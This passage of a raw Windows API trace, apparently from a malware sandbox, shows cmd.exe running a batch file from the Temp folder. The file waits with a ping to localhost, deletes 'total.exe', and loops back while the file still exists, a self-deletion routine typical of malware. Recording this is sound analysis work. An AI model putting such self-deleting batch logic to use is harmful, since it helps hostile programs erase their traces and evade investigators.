hConsoleHandle=0x7, lpMode=0x3fee1c | out: lpMode=0x3fee1c) returned 1 [0160.724] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.724] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3fee48, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3fee48*=0x2) returned 1 [0160.726] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac40640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0160.726] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac35260 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 0x24 [0160.726] _vsnwprintf (in: _Buffer=0x4ac35e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x3fee58 | out: _Buffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 36 [0160.726] _vsnwprintf (in: _Buffer=0x4ac35e88, _BufferCount=0x3da, _Format="%c", _ArgList=0x3fee58 | out: _Buffer=">") returned 1 [0160.726] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.726] GetFileType (hFile=0x7) returned 0x2 [0160.726] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0160.726] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3fee20 | out: lpMode=0x3fee20) returned 1 [0160.726] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.726] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac35e40*, nNumberOfCharsToWrite=0x25, lpNumberOfCharsWritten=0x3fee4c, lpReserved=0x0 | out: lpBuffer=0x4ac35e40*, lpNumberOfCharsWritten=0x3fee4c*=0x25) returned 1 [0160.727] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.727] GetFileType (hFile=0x7) returned 0x2 [0160.727] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0160.727] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff0a4 | out: lpMode=0x3ff0a4) returned 1 [0160.727] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.727] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x781140*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x3ff0d0, lpReserved=0x0 | out: lpBuffer=0x781140*, lpNumberOfCharsWritten=0x3ff0d0*=0x4) returned 1 [0160.727] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3ff0dc | out: _Buffer=" localhost -n 2 ") returned 17 [0160.727] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.727] GetFileType (hFile=0x7) returned 0x2 [0160.727] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0160.727] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff09c | out: lpMode=0x3ff09c) returned 1 [0160.728] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.728] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x3ff0c8, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3ff0c8*=0x11) returned 1 [0160.728] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="%c%c", _ArgList=0x3ff0c8 | out: _Buffer="1>") returned 2 [0160.728] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.728] GetFileType (hFile=0x7) returned 0x2 [0160.728] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0160.728] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff088 | out: lpMode=0x3ff088) returned 1 [0160.728] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.728] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3ff0b4, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3ff0b4*=0x2) returned 1 [0160.729] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3ff0cc | out: _Buffer="NUL ") returned 4 [0160.729] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.729] GetFileType (hFile=0x7) returned 0x2 [0160.729] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0160.729] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff08c | out: lpMode=0x3ff08c) returned 1 [0160.729] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.729] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x3ff0b8, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3ff0b8*=0x4) returned 1 [0160.729] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3ff0fc | out: _Buffer="\r\n") returned 2 [0160.729] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.729] GetFileType (hFile=0x7) returned 0x2 [0160.730] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0160.730] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff0bc | out: lpMode=0x3ff0bc) returned 1 [0160.730] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.730] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3ff0e8, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3ff0e8*=0x2) returned 1 [0160.730] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0160.730] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0160.730] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0160.730] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0160.730] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0160.730] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0160.730] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0160.730] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0160.730] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0160.730] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0160.730] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0160.730] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0160.730] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0160.730] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0160.730] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0160.730] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0160.730] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0160.730] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0160.730] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0160.730] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0160.731] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0160.731] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0160.731] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0160.731] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0160.731] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0160.731] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0160.731] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0160.731] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0160.731] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0160.731] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0160.731] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0160.731] _wcsicmp (_String1="ping", _String2="START") returned -3 [0160.731] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0160.731] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0160.731] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0160.731] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0160.731] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0160.731] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0160.731] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0160.731] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0160.731] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0160.731] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0160.731] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0160.731] SetErrorMode (uMode=0x0) returned 0x8001 [0160.732] SetErrorMode (uMode=0x1) returned 0x0 [0160.732] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x792758, lpFilePart=0x3feea0 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp", lpFilePart=0x3feea0*="Temp") returned 0x24 [0160.732] SetErrorMode (uMode=0x8001) returned 0x1 [0160.732] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac40640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0160.732] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0160.733] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.733] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.733] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.733] GetFileType (hFile=0x7) returned 0x2 [0160.733] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0160.733] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3fee6c | out: lpMode=0x3fee6c) returned 1 [0160.733] _dup (_FileHandle=1) returned 3 [0160.734] _close (_FileHandle=1) returned 0 [0160.735] _wcsicmp (_String1="NUL", _String2="con") returned 11 [0160.735] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x3fee3c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0160.735] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 1 [0160.735] GetConsoleTitleW (in: lpConsoleTitle=0x3fec6c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0160.736] GetStartupInfoW (in: lpStartupInfo=0x3fe844 | out: lpStartupInfo=0x3fe844*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0160.787] CloseHandle (hObject=0x74) returned 1 [0160.787] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0160.787] GetEnvironmentStringsW () returned 0x795b38* [0160.787] FreeEnvironmentStringsW (penv=0x795b38) returned 1 [0160.787] WaitForSingleObject (hHandle=0x7c, dwMilliseconds=0xffffffff) returned 0x0 [0164.997] GetExitCodeProcess (in: hProcess=0x7c, lpExitCode=0x3fe824 | out: lpExitCode=0x3fe824*=0x0) returned 1 [0164.997] CloseHandle (hObject=0x7c) returned 1 [0164.998] _vsnwprintf (in: _Buffer=0x3fe96c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3fe830 | out: _Buffer="00000000") returned 8 [0164.998] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0164.998] GetEnvironmentStringsW () returned 0x794f78* [0164.998] FreeEnvironmentStringsW (penv=0x794f78) returned 1 [0164.998] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0164.998] GetEnvironmentStringsW () returned 0x794f78* [0164.998] FreeEnvironmentStringsW (penv=0x794f78) returned 1 [0164.998] DeleteProcThreadAttributeList (in: lpAttributeList=0x3fe888 | out: lpAttributeList=0x3fe888) [0164.998] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0164.999] _close (_FileHandle=3) returned 0 [0164.999] _get_osfhandle (_FileHandle=1) returned 0x7 [0164.999] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0164.999] _get_osfhandle (_FileHandle=1) returned 0x7 [0164.999] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac341ac | out: lpMode=0x4ac341ac) returned 1 [0164.999] _get_osfhandle (_FileHandle=0) returned 0x3 [0164.999] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac341b0 | out: lpMode=0x4ac341b0) returned 1 [0165.000] SetConsoleInputExeNameW () returned 0x1 [0165.000] GetConsoleOutputCP () returned 0x1b5 [0165.000] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac34260 | out: lpCPInfo=0x4ac34260) returned 1 [0165.000] SetThreadUILanguage (LangId=0x0) returned 0x409 [0165.000] CreateFileW (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\1.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3ff0a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0165.000] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0165.000] _get_osfhandle (_FileHandle=3) returned 0x78 [0165.000] SetFilePointer (in: hFile=0x78, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0165.001] _get_osfhandle (_FileHandle=3) returned 0x78 [0165.001] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0165.001] ReadFile (in: hFile=0x78, lpBuffer=0x4ac36640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3ff088, lpOverlapped=0x0 | out: lpBuffer=0x4ac36640*, lpNumberOfBytesRead=0x3ff088*=0xa6, lpOverlapped=0x0) returned 1 [0165.002] SetFilePointer (in: hFile=0x78, lDistanceToMove=84, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x54 [0165.002] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ac36640, cbMultiByte=52, lpWideCharStr=0x4ac3c640, cchWideChar=8191 | out: lpWideCharStr="del C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe\r\n") returned 52 [0165.003] _tell (_FileHandle=3) returned 84 [0165.003] _close (_FileHandle=3) returned 0 [0165.003] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3fee5c | out: _Buffer="\r\n") returned 2 [0165.003] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.003] GetFileType (hFile=0x7) returned 0x2 [0165.004] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.004] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3fee1c | out: lpMode=0x3fee1c) returned 1 [0165.004] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.004] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3fee48, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3fee48*=0x2) returned 1 [0165.004] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac40640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0165.004] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac35260 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 0x24 [0165.004] _vsnwprintf (in: _Buffer=0x4ac35e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x3fee58 | out: _Buffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 36 [0165.004] _vsnwprintf (in: _Buffer=0x4ac35e88, _BufferCount=0x3da, _Format="%c", _ArgList=0x3fee58 | out: _Buffer=">") returned 1 [0165.004] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.004] GetFileType (hFile=0x7) returned 0x2 [0165.005] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.005] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3fee20 | out: lpMode=0x3fee20) returned 1 [0165.005] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.005] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac35e40*, nNumberOfCharsToWrite=0x25, lpNumberOfCharsWritten=0x3fee4c, lpReserved=0x0 | out: lpBuffer=0x4ac35e40*, lpNumberOfCharsWritten=0x3fee4c*=0x25) returned 1 [0165.005] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.005] GetFileType (hFile=0x7) returned 0x2 [0165.005] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.005] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff0a4 | out: lpMode=0x3ff0a4) returned 1 [0165.006] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.006] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x792348*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x3ff0d0, lpReserved=0x0 | out: lpBuffer=0x792348*, lpNumberOfCharsWritten=0x3ff0d0*=0x3) returned 1 [0165.006] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3ff0dc | out: _Buffer=" C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe ") returned 48 [0165.006] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.006] GetFileType (hFile=0x7) returned 0x2 [0165.006] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.006] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff09c | out: lpMode=0x3ff09c) returned 1 [0165.006] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.006] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x30, lpNumberOfCharsWritten=0x3ff0c8, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3ff0c8*=0x30) returned 1 [0165.007] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3ff0fc | out: _Buffer="\r\n") returned 2 [0165.007] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.007] GetFileType (hFile=0x7) returned 0x2 [0165.007] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.007] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff0bc | out: lpMode=0x3ff0bc) returned 1 [0165.007] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.007] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3ff0e8, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3ff0e8*=0x2) returned 1 [0165.007] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0165.007] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0165.007] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0165.007] GetConsoleTitleW (in: lpConsoleTitle=0x3fec6c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0165.008] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x3fdce4, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x3fdce8, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x3fdce4*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0165.008] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0165.008] _wcsicmp (_String1="total.exe", _String2=".") returned 70 [0165.008] _wcsicmp (_String1="total.exe", _String2="..") returned 70 [0165.008] GetFileAttributesW (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe")) returned 0x2020 [0165.009] DeleteFileW (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe")) returned 1 [0165.009] FindNextFileW (in: hFindFile=0x793908, lpFindFileData=0x798704 | out: lpFindFileData=0x798704) returned 0 [0165.010] GetLastError () returned 0x12 [0165.010] FindClose (in: hFindFile=0x793908 | out: hFindFile=0x793908) returned 1 [0165.010] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.010] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0165.011] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.011] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac341ac | out: lpMode=0x4ac341ac) returned 1 [0165.011] _get_osfhandle (_FileHandle=0) returned 0x3 [0165.011] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac341b0 | out: lpMode=0x4ac341b0) returned 1 [0165.011] SetConsoleInputExeNameW () returned 0x1 [0165.011] GetConsoleOutputCP () returned 0x1b5 [0165.011] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac34260 | out: lpCPInfo=0x4ac34260) returned 1 [0165.011] SetThreadUILanguage (LangId=0x0) returned 0x409 [0165.011] CreateFileW (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\1.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3ff0a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0165.012] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0165.012] _get_osfhandle (_FileHandle=3) returned 0x78 [0165.012] SetFilePointer (in: hFile=0x78, lDistanceToMove=84, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x54 [0165.012] _get_osfhandle (_FileHandle=3) returned 0x78 [0165.012] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x54 [0165.012] ReadFile (in: hFile=0x78, lpBuffer=0x4ac36640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3ff088, lpOverlapped=0x0 | out: lpBuffer=0x4ac36640*, lpNumberOfBytesRead=0x3ff088*=0x72, lpOverlapped=0x0) returned 1 [0165.012] SetFilePointer (in: hFile=0x78, lDistanceToMove=150, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x96 [0165.012] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ac36640, cbMultiByte=66, lpWideCharStr=0x4ac3c640, cchWideChar=8191 | out: lpWideCharStr="if exist C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe goto try\r\n") returned 66 [0165.014] _tell (_FileHandle=3) returned 150 [0165.014] _close (_FileHandle=3) returned 0 [0165.014] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3fee5c | out: _Buffer="\r\n") returned 2 [0165.014] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.014] GetFileType (hFile=0x7) returned 0x2 [0165.015] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.015] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3fee1c | out: lpMode=0x3fee1c) returned 1 [0165.015] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.015] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3fee48, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3fee48*=0x2) returned 1 [0165.015] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac35260 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 0x24 [0165.015] _vsnwprintf (in: _Buffer=0x4ac35e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x3fee58 | out: _Buffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 36 [0165.015] _vsnwprintf (in: _Buffer=0x4ac35e88, _BufferCount=0x3da, _Format="%c", _ArgList=0x3fee58 | out: _Buffer=">") returned 1 [0165.015] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.015] GetFileType (hFile=0x7) returned 0x2 [0165.016] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.016] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3fee20 | out: lpMode=0x3fee20) returned 1 [0165.016] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.016] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac35e40*, nNumberOfCharsToWrite=0x25, lpNumberOfCharsWritten=0x3fee4c, lpReserved=0x0 | out: lpBuffer=0x4ac35e40*, lpNumberOfCharsWritten=0x3fee4c*=0x25) returned 1 [0165.016] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3ff0dc | out: _Buffer="if ") returned 3 [0165.016] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.016] GetFileType (hFile=0x7) returned 0x2 [0165.016] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.016] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff09c | out: lpMode=0x3ff09c) returned 1 [0165.017] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.017] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x3ff0c8, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3ff0c8*=0x3) returned 1 [0165.017] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="%s %s ", _ArgList=0x3ff0bc | out: _Buffer="exist C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe ") returned 53 [0165.017] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.017] GetFileType (hFile=0x7) returned 0x2 [0165.017] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.017] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff07c | out: lpMode=0x3ff07c) returned 1 [0165.017] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.017] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x35, lpNumberOfCharsWritten=0x3ff0a8, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3ff0a8*=0x35) returned 1 [0165.018] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.018] GetFileType (hFile=0x7) returned 0x2 [0165.018] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.018] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff088 | out: lpMode=0x3ff088) returned 1 [0165.018] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.018] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7933a8*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x3ff0b4, lpReserved=0x0 | out: lpBuffer=0x7933a8*, lpNumberOfCharsWritten=0x3ff0b4*=0x4) returned 1 [0165.018] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3ff0c0 | out: _Buffer=" try ") returned 5 [0165.018] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.018] GetFileType (hFile=0x7) returned 0x2 [0165.019] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0165.019] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff080 | out: lpMode=0x3ff080) returned 1 [0165.019] _get_osfhandle (_FileHandle=1) returned 0x7 [0165.019] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x3ff0ac, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3ff0ac*=0x5) returned 1 [0165.020] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="\r\n", 